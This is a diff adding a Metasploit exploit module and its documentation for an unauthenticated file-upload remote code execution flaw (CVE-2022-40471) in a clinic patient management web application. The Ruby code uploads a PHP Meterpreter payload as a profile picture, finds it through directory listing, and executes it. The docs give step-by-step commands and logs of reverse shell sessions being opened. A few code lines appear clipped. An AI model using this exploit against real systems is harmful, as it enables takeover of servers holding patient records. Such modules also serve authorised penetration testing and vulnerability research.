diff --git a/documentation/modules/exploit/multi/http/clinic_pms_fileupload_rce.md b/documentation/modules/exploit/multi/http/clinic_pms_fileupload_rce.md new file mode 100644 index 000000000000..cbe6258daeab --- /dev/null +++ b/documentation/modules/exploit/multi/http/clinic_pms_fileupload_rce.md @@ -0,0 +1,116 @@ +## Vulnerable Application +The Clinic's Patient Management System (CPMS) 1.0 is vulnerable to Unauthenticated Remote Code Execution (RCE) due to a file upload vulnerability. +This exploit allows an attacker to upload arbitrary files, such as a PHP web shell, which can then be executed remotely. +The exploitation occurs because of a misconfiguration in the server, specifically a lack of file validation for uploads and the presence of +a directory listing feature in `/pms/user_images`. +This enables an attacker to upload a PHP file and access it via a publicly accessible URL, executing arbitrary PHP code. + +## Verification Steps + +### Vulnerable Application Installation Setup +1. Install Clinic's Patient Management System 1.0 on your web server. + - Download the Web Application from [here](https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code) + - For **Windows** + - [ ] Open your XAMPP Control Panel and start Apache and MySQL. + - [ ] Extract the downloaded source code zip file. + - [ ] Copy the extracted source code folder and paste it into the XAMPP's "htdocs" directory. + - [ ] Browse the PHPMyAdmin in a browser. i.e. http://localhost/phpmyadmin + - [ ] Create a new database naming `pms_db`. + - [ ] Import the provided SQL file. The file is known as pms_db.sql located inside the database folder. + - [ ] Browse the Clinic Patient Management System in a browser. i.e. http://localhost/pms/ + + - For **Linux** + - [ ] Start Apache2 & MySQL with the command `sudo systemctl start apache2 && sudo systemctl start mysql` + - [ ] Install PHPMyAdmin with the command `sudo apt install phpmyadmin -y` + - [ ] Edit `/etc/apache2/apache2.conf` by appending this line: `Include /etc/phpmyadmin/apache.conf` + - [ ] Extract the downloaded source code zip file into "/var/www/html" directory + - [ ] Next steps are similar to the ones for Windows, so follow that + +2. Start `msfconsole` and load the exploit module: +```bash + msfconsole + use exploit/multi/http/clinic_pms_fileupload_rce +``` + +3. Set the required options: +```bash + set rport + set rhost + set targeturi /pms +``` + +4. Check if the target is vulnerable: +```bash + check +``` + + If the target is vulnerable, you will see a message indicating that the target is susceptible to the exploit: +``` + [+] The target is vulnerable. +``` + +5. Set up the listener for the exploit: +```bash + set lport + set lhost +``` + +6. Launch the exploit: +```bash + exploit +``` + +7. If successful, you will receive a PHP Meterpreter shell. + +## Options +- `TARGETURI`: (Required) The base path to the Clinic Patient Management System (default: `/pms`). +- `LISTING_DELAY`: (Optional) The time to wait before fetching the directory listing after uploading the shell (default: `2` seconds). + + +## Scenarios + +### Clinic's Patient Management System on a Linux Target +```bash +msf exploit(multi/http/clinic_pms_fileupload_rce) > check +[*] Checking if target is vulnerable... +[+] 127.0.0.1:80 - The target is vulnerable. + +msf exploit(multi/http/clinic_pms_fileupload_rce) > exploit +[*] Started reverse TCP handler on 192.168.1.104:4444 +[*] Detected OS: linux +[*] Target is Linux/Unix. Using PHP Meterpreter payload with unlink_self. +[*] Uploading PHP Meterpreter payload as zuX7FDRe.php... +[+] Payload uploaded successfully! +[*] Executing the uploaded shell at /pms/user_images/1734340436zuX7FDRe.php... +[*] Sending stage (40004 bytes) to 192.168.1.104 +[*] Meterpreter session 1 opened (192.168.1.104:4444 -> 192.168.1.104:48290) at 2024-12-16 14:43:59 +0530 + +meterpreter > sysinfo +Computer : kali +OS : Linux kali 6.11.2-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.11.2-1kali1 (2024-10-15) x86_64 +Meterpreter : php/linux +meterpreter > +``` + +### Clinic's Patient Management System on a Windows Target +```bash +msf exploit(multi/http/clinic_pms_fileupload_rce) > check +[*] Checking if target is vulnerable... +[+] 192.168.1.103:80 - The target is vulnerable. + +msf exploit(multi/http/clinic_pms_fileupload_rce) > exploit +[*] Started reverse TCP handler on 192.168.1.104:4444 +[*] Detected OS: winnt +[*] Target is Windows. Using standard PHP Meterpreter payload. +[*] Uploading PHP Meterpreter payload as lgTprVq5.php... +[+] Payload uploaded successfully! +[*] Executing the uploaded shell at /pms/user_images/1734341267lgTprVq5.php... +[*] Sending stage (40004 bytes) to 192.168.1.103 +[*] Meterpreter session 2 opened (192.168.1.104:4444 -> 192.168.1.103:60615) at 2024-12-16 14:57:43 +0530 + +meterpreter > sysinfo +Computer : DESKTOP-VE9J36K +OS : Windows NT DESKTOP-VE9J36K 10.0 build 19045 (Windows 10) AMD64 +Meterpreter : php/windows +meterpreter > +``` diff --git a/modules/exploits/multi/http/clinic_pms_fileupload_rce.rb b/modules/exploits/multi/http/clinic_pms_fileupload_rce.rb new file mode 100644 index 000000000000..edc93226bcc6 --- /dev/null +++ b/modules/exploits/multi/http/clinic_pms_fileupload_rce.rb @@ -0,0 +1,248 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::PhpEXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Clinic\'s Patient Management System 1.0 - Unauthenticated RCE', + 'Description' => %q{ + This module exploits an unauthenticated file upload vulnerability in Clinic's + Patient Management System 1.0. An attacker can upload a PHP web shell and execute + it by leveraging directory listing enabled on the `/pms/user_images` directory. + }, + 'Author' => [ + 'Aaryan Golatkar', # Metasploit Module Developer + 'Oğulcan Hami Gül', # Vulnerability discovery + ], + 'License' => MSF_LICENSE, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Privileged' => false, + 'Targets' => [ + ['Clinic Patient Management System 1.0', {}] + ], + 'DefaultTarget' => 0, + 'References' => [ + ['EDB', '51779'], + ['CVE', '2022-40471'], + ['URL', 'https://www.cve.org/CVERecord?id=CVE-2022-40471'], + ['URL', 'https://drive.google.com/file/d/1m-wTfOL5gY3huaSEM3YPSf98qIrkl-TW/view'] + ], + 'DisclosureDate' => '2022-10-31', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [ARTIFACTS_ON_DISK] + } + ) + ) + + register_options([ + OptString.new('TARGETURI', [true, 'Base path to the Clinic Patient Management System', '/pms']), + OptInt.new('LISTING_DELAY', [true, 'Time to wait before retrieving directory listing (seconds)', 2]), + OptBool.new('DELETE_FILES', [true, 'Delete uploaded files after exploitation', false]) + ]) + end + + def check + print_status('Checking if target is vulnerable...') + + # Step 1: Retrieve PHPSESSID + vprint_status('Fetching PHPSESSID from the server...') + res_session = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'users.php'), + 'method' => 'GET' + }) + + unless res_session && res_session.code == 302 && res_session.respond_to?(:get_cookies) + print_error('Server connect error. Couldn\'t connect or get necessary information - try to check your options.') + return CheckCode::Unknown + end + + phpsessid = res_session.get_cookies.match(/PHPSESSID=([^;]+)/) + if phpsessid.nil? + print_error('Failed to retrieve PHPSESSID. Target may not be vulnerable.') + return CheckCode::Unknown + else + phpsessid = phpsessid[1] + vprint_good("Obtained PHPSESSID: #{phpsessid}") + end + + # Step 2: Attempt File Upload + dummy_filename = "#{Rex::Text.rand_text_alphanumeric(8)}.png" + dummy_content = Rex::Text.rand_text_alphanumeric(20) + dummy_name = Rex::Text.rand_text_alphanumeric(6) + post_data = Rex::MIME::Message.new + post_data.add_part(dummy_name, nil, nil, 'form-data; name="display_name"') + post_data.add_part(dummy_name, nil, nil, 'form-data; name="user_name"') + post_data.add_part(dummy_name, nil, nil, 'form-data; name="password"') + post_data.add_part(dummy_content, 'text/plain', nil, "form-data; name=\"profile_picture\"; filename=\"#{dummy_filename}\"") + post_data.add_part('', nil, nil, 'form-data; name="save_user"') + + vprint_status("Uploading dummy file #{dummy_filename}...") + res_upload = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'users.php'), + 'method' => 'POST', + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'data' => post_data.to_s, + 'cookie' => "PHPSESSID=#{phpsessid}" + }) + + unless res_upload && res_upload.code == 302 + print_error('File upload attempt failed. Target may not be vulnerable.') + return CheckCode::Safe + end + vprint_good('Dummy file uploaded successfully.') + + # Step 3: Verify File in Directory Listing + vprint_status('Verifying uploaded file in /pms/user_images...') + res_listing = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'user_images/'), + 'method' => 'GET', + 'cookie' => "PHPSESSID=#{phpsessid}" + }) + + if res_listing && res_listing.code == 200 && !res_listing.body.nil? && res_listing.body&.include?(dummy_filename) + vprint_good("File #{dummy_filename} found in /pms/user_images. Target is vulnerable!") + CheckCode::Vulnerable + else + vprint_error("File #{dummy_filename} not found in /pms/user_images. Target may not be vulnerable.") + CheckCode::Unknown + end + end + + def upload_shell + random_user = Rex::Text.rand_text_alphanumeric(8) + random_password = Rex::Text.rand_text_alphanumeric(12) + detection_basename = Rex::Text.rand_text_alphanumeric(8).to_s + detection_filename = "#{detection_basename}.php" + + # Step 1: Detect the OS + detection_script = <<~PHP + + PHP + + vprint_status("Uploading OS detection script as #{detection_filename}...") + post_data = Rex::MIME::Message.new + post_data.add_part(random_user, nil, nil, 'form-data; name="display_name"') + post_data.add_part(random_user, nil, nil, 'form-data; name="user_name"') + post_data.add_part(random_password, nil, nil, 'form-data; name="password"') + post_data.add_part(detection_script, 'application/x-php', nil, "form-data; name=\"profile_picture\"; filename=\"#{detection_filename}\"") + post_data.add_part('', nil, nil, 'form-data; name="save_user"') + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'users.php'), + 'method' => 'POST', + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'data' => post_data.to_s + }) + + fail_with(Failure::UnexpectedReply, 'Failed to upload OS detection script') unless res && res.code == 302 + vprint_good('OS detection script uploaded successfully!') + + # Step 2: Retrieve the actual uploaded filename + vprint_status('Retrieving directory listing to identify detection script...') + sleep datastore['LISTING_DELAY'] + + res_listing = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'user_images/'), + 'method' => 'GET' + }) + + fail_with(Failure::UnexpectedReply, 'Failed to retrieve directory listing') unless res_listing && res_listing.code == 200 + + match = res_listing.body&.match(/ detection_url, + 'method' => 'GET' + }) + + fail_with(Failure::UnexpectedReply, 'Failed to execute OS detection script') unless res && res.code == 200 && !res.body.nil? + detected_os = res.body.strip.downcase + vprint_status("Detected OS: #{detected_os}") + + # Step 4: Choose payload based on OS + if detected_os.include?('win') + payload_content = get_write_exec_payload + print_status('Target is Windows. Using standard PHP Meterpreter payload.') + else + payload_content = get_write_exec_payload(unlink_self: true) + print_status('Target is Linux/Unix. Using PHP Meterpreter payload with unlink_self.') + end + + # Step 5: Upload the payload + random_user = Rex::Text.rand_text_alphanumeric(8) + random_password = Rex::Text.rand_text_alphanumeric(12) + payload_filename = "#{Rex::Text.rand_text_alphanumeric(8)}.php" + + vprint_status("Uploading PHP Meterpreter payload as #{payload_filename}...") + + post_data = Rex::MIME::Message.new + post_data.add_part(random_user, nil, nil, 'form-data; name="display_name"') + post_data.add_part(random_user, nil, nil, 'form-data; name="user_name"') + post_data.add_part(random_password, nil, nil, 'form-data; name="password"') + post_data.add_part(payload_content, 'application/x-php', nil, "form-data; name=\"profile_picture\"; filename=\"#{payload_filename}\"") + post_data.add_part('', nil, nil, 'form-data; name="save_user"') + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'users.php'), + 'method' => 'POST', + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'data' => post_data.to_s + }) + + fail_with(Failure::UnexpectedReply, 'Failed to upload PHP payload') unless res && res.code == 302 + print_good('Payload uploaded successfully!') + + # Verify the presence of the uploaded file in the directory listing + vprint_status('Retrieving directory listing to confirm the uploaded payload...') + sleep datastore['LISTING_DELAY'] # Allow time for the file to appear on the server + + res_listing = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'user_images/'), + 'method' => 'GET' + }) + + fail_with(Failure::UnexpectedReply, 'Failed to retrieve directory listing') unless res_listing && res_listing.code == 200 + + # Search for the uploaded filename + match = res_listing.body&.match(/href="(\d+#{Regexp.escape(payload_filename)})"/) + fail_with(Failure::NotFound, 'Uploaded file not found in directory listing') if match.nil? + + actual_filename = match[1] + vprint_good("Verified payload presence: #{actual_filename}") + register_file_for_cleanup(actual_detection_filename, actual_filename) if datastore['DELETE_FILES'] + actual_filename + end + + def exploit + # Upload the shell and retrieve its filename + uploaded_filename = upload_shell + + # Construct the URL for the uploaded shell + shell_url = normalize_uri(target_uri.path, 'user_images', uploaded_filename) + print_status("Executing the uploaded shell at #{shell_url}...") + + # Execute the uploaded shell + send_request_raw({ 'uri' => shell_url, 'method' => 'GET' }) + end +end